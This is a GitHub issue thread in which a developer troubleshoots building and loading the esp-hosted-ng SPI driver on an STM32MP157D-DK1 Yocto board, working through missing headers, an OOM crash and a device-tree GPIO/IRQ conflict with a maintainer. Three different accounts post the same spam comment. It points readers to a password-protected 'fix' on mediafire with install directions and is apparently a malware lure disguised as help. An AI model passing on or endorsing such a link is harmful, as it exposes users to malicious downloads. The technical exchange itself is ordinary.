espressif/esp-hosted #467: Error executing (bash rpi_init.sh spi) on STM32MP157D-DK1 yocto

Jmonsonis, 2024-08-27:
We are trying to use esp-hosted-ng on a STM32MP157D-DK1 running yocto.

**This is the packages installed in yocto:**

IMAGE_INSTALL:append = " kernel-devsrc kernel-modules"
 
EXTRA_IMAGE_FEATURES += " debug-tweaks dev-pkgs package-management tools-sdk "
 
CORE_IMAGE_EXTRA_INSTALL += " git bluez5 rfkill dtc sudo grep nano iproute2 make bc bison flex openssl-dev ncurses-dev"

Following the SPI configuration guide on setup.md we are facing a problem executing bash rpi_init.sh spi.
<details><summary>Error</summary>

```
root@stm32mp1:~/esp-hosted/esp_hosted_ng/host# bash rpi_init.sh spi
Building for spi protocol
spi
wlan_init
wlan_init
make
#rm -rf *.o sdio/*.o spi/*.o *.ko
make ARCH=arm CROSS_COMPILE=arm-ostl-linux-gnueabi- -C /lib/modules/6.1.82/build M=/home/root/esp-hosteds
make ARCH=arm CROSS_COMPILE=arm-ostl-linux-gnueabi- -C /lib/modules/6.1.82/build M=/home/root/esp-hostedn
-I/home/root/esp-hosted/esp_hosted_ng/host/include -I/home/root/esp-hosted/esp_hosted_ng/host -I/usr/inci
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/spi/esp_spi.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_bt.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/main.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_cmd.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_utils.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_cfg80211.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_stats.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_debugfs.o
In file included from ./include/uapi/linux/unistd.h:8,
                 from ./include/asm-generic/seccomp.h:11,
                 from ./arch/arm/include/asm/seccomp.h:5,
                 from ./include/linux/seccomp.h:22,
                 from ./include/linux/sched.h:22,
                 from ./include/linux/hardirq.h:9,
                 from ./include/linux/interrupt.h:11,
                 from /home/root/esp-hosted/esp_hosted_ng/host/include/esp.h:13,
                 from /home/root/esp-hosted/esp_hosted_ng/host/include/esp_utils.h:11,
                 from /home/root/esp-hosted/esp_hosted_ng/host/esp_utils.c:9:
./arch/arm/include/asm/unistd.h:14:10: fatal error: asm/unistd-nr.h: No such file or directory
   14 | #include <asm/unistd-nr.h>
      |          ^~~~~~~~~~~~~~~~~
compilation terminated.
make[2]: *** [scripts/Makefile.build:250: /home/root/esp-hosted/esp_hosted_ng/host/esp_utils.o] Error 1
make[2]: *** Waiting for unfinished jobs....
In file included from ./include/uapi/linux/unistd.h:8,
                 from ./include/asm-generic/seccomp.h:11,
                 from ./arch/arm/include/asm/seccomp.h:5,
                 from ./include/linux/seccomp.h:22,
                 from ./include/linux/sched.h:22,
                 from ./include/linux/hardirq.h:9,
                 from ./include/linux/interrupt.h:11,
                 from /home/root/esp-hosted/esp_hosted_ng/host/include/esp.h:13,
                 from /home/root/esp-hosted/esp_hosted_ng/host/include/esp_stats.h:11,
                 from /home/root/esp-hosted/esp_hosted_ng/host/esp_stats.c:10:
./arch/arm/include/asm/unistd.h:14:10: fatal error: asm/unistd-nr.h: No such file or directory
   14 | #include <asm/unistd-nr.h>
      |          ^~~~~~~~~~~~~~~~~
compilation terminated.
make[2]: *** [scripts/Makefile.build:250: /home/root/esp-hosted/esp_hosted_ng/host/esp_stats.o] Error 1
In file included from ./include/uapi/linux/unistd.h:8,
                 from ./include/asm-generic/seccomp.h:11,
                 from ./arch/arm/include/asm/seccomp.h:5,
                 from ./include/linux/seccomp.h:22,
                 from ./include/linux/sched.h:22,
                 from ./include/linux/hardirq.h:9,
                 from ./include/linux/interrupt.h:11,
                 from /home/root/esp-hosted/esp_hosted_ng/host/include/esp.h:13,
                 from /home/root/esp-hosted/esp_hosted_ng/host/include/esp_cmd.h:11,
                 from /home/root/esp-hosted/esp_hosted_ng/host/esp_cmd.c:9:
./arch/arm/include/asm/unistd.h:14:10: fatal error: asm/unistd-nr.h: No such file or directory
   14 | #include <asm/unistd-nr.h>
      |          ^~~~~~~~~~~~~~~~~
compilation terminated.
make[2]: *** [scripts/Makefile.build:250: /home/root/esp-hosted/esp_hosted_ng/host/esp_cmd.o] Error 1
In file included from ./include/uapi/linux/unistd.h:8,
                 from ./include/asm-generic/seccomp.h:11,
                 from ./arch/arm/include/asm/seccomp.h:5,
                 from ./include/linux/seccomp.h:22,
                 from ./include/linux/sched.h:22,
                 from ./include/linux/ratelimit.h:6,
                 from ./include/linux/dev_printk.h:16,
                 from ./include/linux/device.h:15,
                 from ./include/linux/spi/spi.h:10,
                 from /home/root/esp-hosted/esp_hosted_ng/host/spi/esp_spi.c:7:
./arch/arm/include/asm/unistd.h:14:10: fatal error: asm/unistd-nr.h: No such file or directory
   14 | #include <asm/unistd-nr.h>
      |          ^~~~~~~~~~~~~~~~~
compilation terminated.
make[2]: *** [scripts/Makefile.build:250: /home/root/esp-hosted/esp_hosted_ng/host/spi/esp_spi.o] Error 1
In file included from ./include/uapi/linux/unistd.h:8,
                 from ./include/asm-generic/seccomp.h:11,
                 from ./arch/arm/include/asm/seccomp.h:5,
                 from ./include/linux/seccomp.h:22,
                 from ./include/linux/sched.h:22,
                 from ./include/linux/hardirq.h:9,
                 from ./include/linux/interrupt.h:11,
                 from /home/root/esp-hosted/esp_hosted_ng/host/include/esp.h:13,
                 from /home/root/esp-hosted/esp_hosted_ng/host/include/esp_api.h:11,
                 from /home/root/esp-hosted/esp_hosted_ng/host/esp_bt.c:9:
./arch/arm/include/asm/unistd.h:14:10: fatal error: asm/unistd-nr.h: No such file or directory
   14 | #include <asm/unistd-nr.h>
      |          ^~~~~~~~~~~~~~~~~
compilation terminated.
make[2]: *** [scripts/Makefile.build:250: /home/root/esp-hosted/esp_hosted_ng/host/esp_bt.o] Error 1
In file included from ./include/uapi/linux/unistd.h:8,
                 from ./include/asm-generic/seccomp.h:11,
                 from ./arch/arm/include/asm/seccomp.h:5,
                 from ./include/linux/seccomp.h:22,
                 from ./include/linux/sched.h:22,
                 from ./include/linux/hardirq.h:9,
                 from ./include/linux/interrupt.h:11,
                 from /home/root/esp-hosted/esp_hosted_ng/host/include/esp.h:13,
                 from /home/root/esp-hosted/esp_hosted_ng/host/esp_cfg80211.c:10:
./arch/arm/include/asm/unistd.h:14:10: fatal error: asm/unistd-nr.h: No such file or directory
   14 | #include <asm/unistd-nr.h>
      |          ^~~~~~~~~~~~~~~~~
compilation terminated.
make[2]: *** [scripts/Makefile.build:250: /home/root/esp-hosted/esp_hosted_ng/host/esp_cfg80211.o] Error1
In file included from ./arch/arm/include/asm/vdso/gettimeofday.h:12,
                 from ./include/vdso/datapage.h:137,
                 from ./arch/arm/include/asm/vdso_datapage.h:14,
                 from ./arch/arm/include/asm/elf.h:7,
                 from ./include/linux/elf.h:6,
                 from ./include/linux/module.h:19,
                 from /home/root/esp-hosted/esp_hosted_ng/host/main.c:10:
./arch/arm/include/asm/unistd.h:14:10: fatal error: asm/unistd-nr.h: No such file or directory
   14 | #include <asm/unistd-nr.h>
      |          ^~~~~~~~~~~~~~~~~
compilation terminated.
make[2]: *** [scripts/Makefile.build:250: /home/root/esp-hosted/esp_hosted_ng/host/main.o] Error 1
In file included from ./include/uapi/linux/unistd.h:8,
                 from ./include/asm-generic/seccomp.h:11,
                 from ./arch/arm/include/asm/seccomp.h:5,
                 from ./include/linux/seccomp.h:22,
                 from ./include/linux/sched.h:22,
                 from ./include/linux/sched/mm.h:7,
                 from ./include/linux/xarray.h:19,
                 from ./include/linux/list_lru.h:14,
                 from ./include/linux/fs.h:13,
                 from ./include/linux/debugfs.h:15,
                 from /home/root/esp-hosted/esp_hosted_ng/host/esp_debugfs.c:2:
./arch/arm/include/asm/unistd.h:14:10: fatal error: asm/unistd-nr.h: No such file or directory
   14 | #include <asm/unistd-nr.h>
      |          

compilation terminated.
make[2]: *** [scripts/Makefile.build:250: /home/root/esp-hosted/esp_hosted_ng/host/esp_debugfs.o] Error 1
make[1]: *** [Makefile:2035: /home/root/esp-hosted/esp_hosted_ng/host] Error 2
make: *** [Makefile:56: compile] Error 2
insmod: ERROR: could not load module esp32_spi.ko: No such file or directory
```

</details>

The error says that unistd-nr.h doesn't exist but we also tried to copy the file from a working raspberry pi 3 B+ but when reexecuting bash rpi_init.sh spi raises a watchdog panic that reboots the STM32MP157D-DK1.

We might add some dependency to the yocto configuration?

mantriyogesh, 2024-08-27:
Hello @Jmonsonis ,

I understand your frustrattion, but the file which is troublesome, unistd-nr.h, 
is included from unistd.h internally.

unistd.h is pretty standard file. 

> but we also tried to copy the file from a working raspberry pi 3 B+

Please refrain from doing this. I think better assess :
a. why your kernel suit or kernel headers did not include this file.
b. Also,  is it not mandatory and definitions are provided by some other file.
c. if mandatory, do you need to enable any yocto recipe to get kernel module building toolchain/sdk (typically the SoC provides the way how you should build the kernel module)

Also can you please provide output of : 
```
uname -a
```

ESMELSTEPHANE24, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

MirsonMboa, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

Jmonsonis, 2024-08-27:
Thanks for your fast reply,

Just tried to comment the include of unistd-nr.h and seems to raise the same error that raises when copying the file.
<details><summary>Error</summary>

```
root@stm32mp1:~/esp-hosted/esp_hosted_ng/host# bash rpi_init.sh spi

Building for spi protocol

spi

wlan_init

wlan_init

make

#rm -rf *.o sdio/*.o spi/*.o *.ko

make ARCH=arm CROSS_COMPILE=arm-ostl-linux-gnueabi- -C /lib/modules/6.1.82/build M=/home/root/esp-hosteds

make ARCH=arm CROSS_COMPILE=arm-ostl-linux-gnueabi- -C /lib/modules/6.1.82/build M=/home/root/esp-hostedn

-I/home/root/esp-hosted/esp_hosted_ng/host/include -I/home/root/esp-hosted/esp_hosted_ng/host -I/usr/inci

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/spi/esp_spi.o

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_bt.o

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/main.o

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_cmd.o

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_utils.o

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_cfg80211.o

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_stats.o

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_debugfs.o

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_log.o

[ 5538.563196] cc1 invoked oom-killer: gfp_mask=0x140cca(GFP_HIGHUSER_MOVABLE|__GFP_COMP), order=0, oom_0

[ 5538.575134] CPU: 0 PID: 4220 Comm: cc1 Not tainted 6.1.82 #1

[ 5538.579440] Hardware name: STM32 (Device Tree Support)

[ 5538.584642]  unwind_backtrace from show_stack+0x10/0x14

[ 5538.589789]  show_stack from dump_stack_lvl+0x40/0x4c

[ 5538.594821]  dump_stack_lvl from dump_header+0x48/0x204

[ 5538.600032]  dump_header from oom_kill_process+0x218/0x224

[ 5538.605553]  oom_kill_process from out_of_memory+0x100/0x350

[ 5538.611205]  out_of_memory from __alloc_pages_may_oom+0xfc/0x1c0

[ 5538.617227]  __alloc_pages_may_oom from __alloc_pages_slowpath.constprop.0+0x624/0xaf4

[ 5538.625123]  __alloc_pages_slowpath.constprop.0 from __alloc_pages+0x1a8/0x31c

[ 5538.632408]  __alloc_pages from do_anonymous_page+0x64/0x480

[ 5538.638083]  do_anonymous_page from handle_mm_fault+0x12c/0x2ac

[... 158 lines cut ...]
[ 5539.268305] oom-kill:constraint=CONSTRAINT_NONE,nodemask=(null),cpuset=/,mems_allowed=0,global_oom,ta0

[ 5539.284048] Out of memory: Killed process 4216 (cc1) total-vm:72064kB, anon-rss:48880kB, file-rss:8640

arm-ostl-linux-gnueabi-gcc: fatal error: Killed signal terminated program cc1

compilation terminated.

make[2]: *** [scripts/Makefile.build:250: /home/root/esp-hosted/esp_hosted_ng/host/esp_cmd.o] Error 1

make[2]: *** Waiting for unfinished jobs....

E/TC:1   Panic 'Watchdog' at ?:0
```

</details>

<details><summary>Output uname -a</summary>

```
root@stm32mp1:~# uname -a
Linux stm32mp1 6.1.82 #1 SMP PREEMPT Fri Mar 15 18:27:50 UTC 2024 armv7l GNU/Linux
```

</details>

FoioMikael, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

Jmonsonis, 2024-08-27:
> Hello @Jmonsonis ,
>
> I understand your frustrattion, but the file which is troublesome, unistd-nr.h, is included from unistd.h internally.
>
> unistd.h is pretty standard file.
>
>
> Please refrain from [...]

Thanks for your fast reply,

Just tried to comment the include of unistd-nr.h and seems to raise the same error that raises when copying the file.
<details><summary>Error</summary>

```
root@stm32mp1:~/esp-hosted/esp_hosted_ng/host# bash rpi_init.sh spi

Building for spi protocol

spi

wlan_init

wlan_init

make

#rm -rf *.o sdio/*.o spi/*.o *.ko

make ARCH=arm CROSS_COMPILE=arm-ostl-linux-gnueabi- -C /lib/modules/6.1.82/build M=/home/root/esp-hosteds

make ARCH=arm CROSS_COMPILE=arm-ostl-linux-gnueabi- -C /lib/modules/6.1.82/build M=/home/root/esp-hostedn

-I/home/root/esp-hosted/esp_hosted_ng/host/include -I/home/root/esp-hosted/esp_hosted_ng/host -I/usr/inci

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/spi/esp_spi.o

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_bt.o

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/main.o

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_cmd.o

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_utils.o

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_cfg80211.o

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_stats.o

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_debugfs.o

  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_log.o

[ 5538.563196] cc1 invoked oom-killer: gfp_mask=0x140cca(GFP_HIGHUSER_MOVABLE|__GFP_COMP), order=0, oom_0

[ 5538.575134] CPU: 0 PID: 4220 Comm: cc1 Not tainted 6.1.82 #1

[ 5538.579440] Hardware name: STM32 (Device Tree Support)

[ 5538.584642]  unwind_backtrace from show_stack+0x10/0x14

[ 5538.589789]  show_stack from dump_stack_lvl+0x40/0x4c

[ 5538.594821]  dump_stack_lvl from dump_header+0x48/0x204

[ 5538.600032]  dump_header from oom_kill_process+0x218/0x224

[ 5538.605553]  oom_kill_process from out_of_memory+0x100/0x350

[ 5538.611205]  out_of_memory from __alloc_pages_may_oom+0xfc/0x1c0
[... 167 lines cut ...]
[ 5539.268305] oom-kill:constraint=CONSTRAINT_NONE,nodemask=(null),cpuset=/,mems_allowed=0,global_oom,ta0

[ 5539.284048] Out of memory: Killed process 4216 (cc1) total-vm:72064kB, anon-rss:48880kB, file-rss:8640

arm-ostl-linux-gnueabi-gcc: fatal error: Killed signal terminated program cc1

compilation terminated.

make[2]: *** [scripts/Makefile.build:250: /home/root/esp-hosted/esp_hosted_ng/host/esp_cmd.o] Error 1

make[2]: *** Waiting for unfinished jobs....

E/TC:1   Panic 'Watchdog' at ?:0
```

</details>

<details><summary>Output uname -a</summary>

```
root@stm32mp1:~# uname -a
Linux stm32mp1 6.1.82 #1 SMP PREEMPT Fri Mar 15 18:27:50 UTC 2024 armv7l GNU/Linux
```

</details>

mantriyogesh, 2024-08-27:
If you are already building within target, please check the memory available. In general, for yocto, generally the setup being large is built outside and only the kernel module is copied and inserted.

It would be important to identify why the oom occurs. if it is due to building, worth to lower the parallel processes for building.

Anyway, the cross compilation is not required if you are building on target. (also sdk being generally extremely large, not generally recommended to setup on the target).

**Despite all this**, if you still wish to try on target,

1. remove -j8
2. remove **ARCH**=arm **CROSS_COMPILE**=arm-ostl-linux-gnueabi-
and try again.

Jmonsonis, 2024-08-27:
After removing -j8 and ARCH=arm CROSS_COMPILE=arm-ostl-linux-gnueabi- the oom error is gone but we got the /bin/sh: 1: scripts/mod/modpost: not found error.
But after running make prepare0 in the path /usr/src/kernel
it seems that both modpost and unistd-nr.h have been generated.

And although now we have no error with the make we still can't activate the SPI.

<details><summary>Output</summary>

```
root@stm32mp1:~/esp-hosted/esp_hosted_ng/host# bash rpi_init.sh spi
Building for spi protocol
spi
bluetooth module inserted
[  382.030065] Bluetooth: Core ver 2.22
[  382.032459] NET: Registered PF_BLUETOOTH protocol family
[  382.037699] Bluetooth: HCI device and connection manager initialized
[  382.043909] Bluetooth: HCI socket layer initialized
[  382.048865] Bluetooth: L2CAP socket layer initialized
[  382.053895] Bluetooth: SCO socket layer initialized
wlan_init
wlan_init
make
#rm -rf *.o sdio/*.o spi/*.o *.ko
make -C /lib/modules/6.1.82/build M=/home/root/esp-hosted/esp_hosted_ng/host clean
make -C /lib/modules/6.1.82/build M=/home/root/esp-hosted/esp_hosted_ng/host modules
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/spi/esp_spi.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_bt.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/main.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_cmd.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_utils.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_cfg80211.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_stats.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_debugfs.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_log.o
  LD [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp32_spi.o
  MODPOST /home/root/esp-hosted/esp_hosted_ng/host/Module.symvers
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp32_spi.mod.o
  LD [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp32_spi.ko
-I/home/root/esp-hosted/esp_hosted_ng/host/include -I/home/root/esp-hosted/esp_hosted_ng/host -I/usr/inci
[  488.354214] esp32_spi: loading out-of-tree module taints kernel.
[  488.584853] esp32_spi: spi_dev_init: Failed to obtain SPI master handle
[  489.023576] esp32_spi: spi_init: Failed Init SPI device
esp32 module inserted 
ESP32 host init successfully completed
```

</details>

mantriyogesh, 2024-08-28:
This is because ESP kernel module failed to claim the handle of spi bus.

Check the [porting guide](https://github.com/espressif/esp-hosted/blob/master/esp_hosted_ng/docs/porting_guide.md) to find out 
- Disabling of spidev using reference device tree (device tree to be changed as per your SoC)
- 3 extra gpios to be configured, in device tree
- Verification of these new gpios
- correct place to update the bus, cs instance to be used

Additionally, note the  expected length of jumper cables and some more details in this single doc.

Once you adapt or port your platform and the device tree correctly it should work.

Changes in device tree are are platform specific, and out of scope for ESP-Hosted. If you face issues, using dmesg logs should be easy to figure out. In any case, you can send us the logs (similar to earlier post). We would try our best to get you onboard.

Jmonsonis, 2024-08-28:
It seems to be a configuration problem as you said.

I configured three pins (Reset, Handshake and Data ready) as outputs in the device tree but now the command raises an error with data ready.

<details><summary>Error</summary>

```
bash rpi_init.sh spi
Building for spi protocol
spi
bluetooth module inserted
[   40.412706] Bluetooth: Core ver 2.22
[   40.415124] NET: Registered PF_BLUETOOTH protocol family
[   40.427984] Bluetooth: HCI device and connection manager initialized
[   40.433003] Bluetooth: HCI socket layer initialized
[   40.438261] Bluetooth: L2CAP socket layer initialized
[   40.442940] Bluetooth: SCO socket layer initialized
wlan_init
wlan_init
make
#rm -rf *.o sdio/*.o spi/*.o *.ko
make -C /lib/modules/6.1.82/build M=/home/root/esp-hosted/esp_hosted_ng/host clean
  CLEAN   /home/root/esp-hosted/esp_hosted_ng/host/Module.symvers
make -C /lib/modules/6.1.82/build M=/home/root/esp-hosted/esp_hosted_ng/host modules
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/spi/esp_spi.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_bt.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/main.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_cmd.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_utils.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_cfg80211.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_stats.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_debugfs.o
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp_log.o
  LD [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp32_spi.o
  MODPOST /home/root/esp-hosted/esp_hosted_ng/host/Module.symvers
  CC [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp32_spi.mod.o
  LD [M]  /home/root/esp-hosted/esp_hosted_ng/host/esp32_spi.ko
-I/home/root/esp-hosted/esp_hosted_ng/host/include -I/home/root/esp-hosted/esp_hosted_ng/host -I/usr/include -I/usr/include/asm-generic -I/home/root/esp-hosted/esp_hosted_ng/host/spi
[  146.571122] esp32_spi: loading out-of-tree module taints kernel.
[  146.799873] esp32_spi: spi_dev_init: ESP32 peripheral is registered to SPI bus [0],chip select [0], SPI Clock [10]
[  146.809616] genirq: Flags mismatch irq 86. 00000081 (ESP_SPI_DATA_READY) vs. 00002008 (1-0028)
[  146.817691] ------------[ cut here ]------------
[  146.822101] WARNING: CPU: 0 PID: 1341 at fs/proc/generic.c:718 remove_proc_entry+0x1b0/0x1bc
[  146.830676] remove_proc_entry: removing non-empty directory 'irq/89', leaking at least 'ESP_SPI'
[  146.839403] Modules linked in: esp32_spi(O+) bluetooth ecdh_generic ecc libaes cfg80211 stm32_adc stm32_timer_trigger stm32_lptimer_trigger snd_soc_stm32_sai_sub usb_f_ncm u_ether snd_soc_audio_graph6
[  146.888026] CPU: 0 PID: 1341 Comm: insmod Tainted: G           O       6.1.82 #1
[  146.895196] Hardware name: STM32 (Device Tree Support)
[  146.900411]  unwind_backtrace from show_stack+0x10/0x14
[  146.905561]  show_stack from dump_stack_lvl+0x40/0x4c
[  146.910592]  dump_stack_lvl from __warn+0x78/0x158
[  146.915425]  __warn from warn_slowpath_fmt+0x1f0/0x1f8
[  146.920564]  warn_slowpath_fmt from remove_proc_entry+0x1b0/0x1bc
[  146.926613]  remove_proc_entry from unregister_irq_proc+0xd8/0xfc
[  146.932764]  unregister_irq_proc from free_desc+0x38/0x74
[  146.938108]  free_desc from irq_free_descs+0x4c/0x78
[  146.943042]  irq_free_descs from stm32_gpio_free+0x48/0x9c
[  146.948593]  stm32_gpio_free from gpiod_free_commit+0x7c/0x14c
[  146.954338]  gpiod_free_commit from gpiod_free+0x1c/0x40
[  146.959669]  gpiod_free from spi_dev_init+0x378/0x408 [esp32_spi]
[  146.965740]  spi_dev_init [esp32_spi] from esp_init_interface_layer+0xdc/0x15c [esp32_spi]
[  146.974032]  esp_init_interface_layer [esp32_spi] from esp_init+0x180/0x1000 [esp32_spi]
[  146.982119]  esp_init [esp32_spi] from do_one_initcall+0x58/0x260
[  146.988229]  do_one_initcall from do_init_module+0x44/0x1e8
[  146.993778]  do_init_module from sys_finit_module+0xd4/0x140
[  146.999431]  sys_finit_module from ret_fast_syscall+0x0/0x54
[  147.005069] Exception stack(0xdedadfa8 to 0xdedadff0)
[  147.010179] dfa0:                   00027190 00000000 00000003 00027190 00000000 00000001
[  147.018330] dfc0: 00027190 00000000 000271b0 0000017b 00000004 00000000 bebc2ec3 00027190
[  147.026474] dfe0: bebc2bf0 bebc2be0 0001c709 b6ccf592
[  147.031654] ---[ end trace 0000000000000000 ]---
[... 33 lines cut ...]
[  147.755120]  dump_stack_lvl from __warn+0x78/0x158
[  147.759894]  __warn from warn_slowpath_fmt+0x1f0/0x1f8
[  147.765071]  warn_slowpath_fmt from __free_irq+0x1dc/0x360
[  147.770546]  __free_irq from free_irq+0x38/0x94
[  147.775105]  free_irq from spi_exit+0x1c4/0x1f0 [esp32_spi]
[  147.780597]  spi_exit [esp32_spi] from esp_init_interface_layer+0x10c/0x15c [esp32_spi]
[  147.788649]  esp_init_interface_layer [esp32_spi] from esp_init+0x180/0x1000 [esp32_spi]
[  147.796702]  esp_init [esp32_spi] from do_one_initcall+0x58/0x260
[  147.802864]  do_one_initcall from do_init_module+0x44/0x1e8
[  147.808347]  do_init_module from sys_finit_module+0xd4/0x140
[  147.814031]  sys_finit_module from ret_fast_syscall+0x0/0x54
[  147.819709] Exception stack(0xdedadfa8 to 0xdedadff0)
[  147.824770] dfa0:                   00027190 00000000 00000003 00027190 00000000 00000001
[  147.832958] dfc0: 00027190 00000000 000271b0 0000017b 00000004 00000000 bebc2ec3 00027190
[  147.841040] dfe0: bebc2bf0 bebc2be0 0001c709 b6ccf592
[  147.846094] ---[ end trace 0000000000000000 ]---
[  148.267869] esp32_spi: spi_init: Failed Init SPI device
esp32 module inserted 
ESP32 host init successfully completed
```

</details>

I also attach you the configuration file of the device tree if you want to check it.
[stm32mp157d-stm32mp157d_dk1-mx.txt](https://github.com/user-attachments/files/16783084/stm32mp157d-stm32mp157d_dk1-mx.txt)

mantriyogesh, 2024-08-28:
Let me check and come back

mantriyogesh, 2024-08-28:
From the error it looks like kernel is denying to set irq on the GPIO 

While we are not expert of dts, we can just provide suggestion.

```
		pinctrl = "/soc/pinctrl@50002000";
		gpioa = "/soc/pinctrl@50002000/gpio@50002000";
		gpiob = "/soc/pinctrl@50002000/gpio@50003000";
		gpioc = "/soc/pinctrl@50002000/gpio@50004000";
		gpiod = "/soc/pinctrl@50002000/gpio@50005000";
		gpioe = "/soc/pinctrl@50002000/gpio@50006000";
		gpiof = "/soc/pinctrl@50002000/gpio@50007000";
		gpiog = "/soc/pinctrl@50002000/gpio@50008000";
		gpioh = "/soc/pinctrl@50002000/gpio@50009000";
		gpioi = "/soc/pinctrl@50002000/gpio@5000a000";
		gpioj = "/soc/pinctrl@50002000/gpio@5000b000";
		gpiok = "/soc/pinctrl@50002000/gpio@5000c000";
```

looks like 

```
	gpio {
		compatible = "gpio";

		data_ready {
			gpios = <0x65 0x07 0x00>;
			label = "Data Ready";
			status = "okay";
		};

		handshake {
			gpios = <0x31 0x0f 0x00>;
			label = "Handshake";
			status = "okay";
		};

		reset_esp32 {
			gpios = <0x66 0x0b 0x00>;
			label = "Reset ESP32";
			status = "okay";
		};
	};
```

the data ready `0x07` might be wrong.

If you feel it is correct and no doubts, then check if this gpio being used in some other peripheral.

mantriyogesh, 2024-08-29:
Please provide the texture logs for next items 
1. Esp logs (minicom or IDF.py monitor) from startup
2. Host logs
- dmesg from start up
- modified dts or dtsi
3. Got commit used at both the sides

Jmonsonis, 2024-08-30:
Here are the logs you requested.

<details><summary>ESP Log</summary>

```
idf.py monitor
Executing action: monitor
Serial port /dev/ttyUSB0
Connecting....
Detecting chip type... ESP32-C3
Running idf_monitor in directory /home/usuario/Documentos/esp-hosted/esp_hosted_ng/esp/esp_driver/network_adapter
Executing "/home/usuario/.espressif/python_env/idf5.1_py3.8_env/bin/python /home/usuario/Documentos/esp-hosted/esp_hosted_ng/esp/esp_driver/esp-idf/tools/idf_monitor.py -p /dev/ttyUSB0 -b 115200 --toolchain-prefix riscv32-esp-elf- --target esp32c3 --revision 3 --decode-panic backtrace /home/usuario/Documentos/esp-hosted/esp_hosted_ng/esp/esp_driver/network_adapter/build/network_adapter.elf -m '/home/usuario/.espressif/python_env/idf5.1_py3.8_env/bin/python' '/home/usuario/Documentos/esp-hosted/esp_hosted_ng/esp/esp_driver/esp-idf/tools/idf.py'"...
--- esp-idf-monitor 1.4.0 on /dev/ttyUSB0 115200 ---
--- Quit: Ctrl+] | Menu: Ctrl+T | Help: Ctrl+T followed by Ctrl+H ---
ESP-ROM:esp32c3-api1-20210207
Build:Feb  7 2021
rst:0x1 (POWERON),boot:0xc (SPI_FAST_FLASH_BOOT)
SPIWP:0xee
mode:DIO, clock div:1
load:0x3fcd5820,len:0x170c
load:0x403cc710,len:0x968
load:0x403ce710,len:0x2f9c
entry 0x403cc710
I (30) boot: ESP-IDF e7771c75-dirty 2nd stage bootloader
I (30) boot: compile time Aug 28 2024 09:34:26
I (30) boot: chip revision: v0.3
I (34) boot.esp32c3: SPI Speed      : 80MHz
I (39) boot.esp32c3: SPI Mode       : DIO
I (43) boot.esp32c3: SPI Flash Size : 4MB
I (48) boot: Enabling RNG early entropy source...
I (54) boot: Partition Table:
I (57) boot: ## Label            Usage          Type ST Offset   Length
I (64) boot:  0 nvs              WiFi data        01 02 00009000 00004000
I (72) boot:  1 otadata          OTA data         01 00 0000d000 00002000
I (79) boot:  2 phy_init         RF data          01 01 0000f000 00001000
I (87) boot:  3 factory          factory app      00 00 00010000 00100000
I (94) boot:  4 ota_0            OTA app          00 10 00110000 00100000
I (102) boot:  5 ota_1            OTA app          00 11 00210000 00100000
I (109) boot: End of partition table
I (114) boot: Defaulting to factory image
I (118) esp_image: segment 0: paddr=00010020 vaddr=3c090020 size=1f9f8h (129528) map
I (148) esp_image: segment 1: paddr=0002fa20 vaddr=3fc94600 size=005f8h (  1528) load
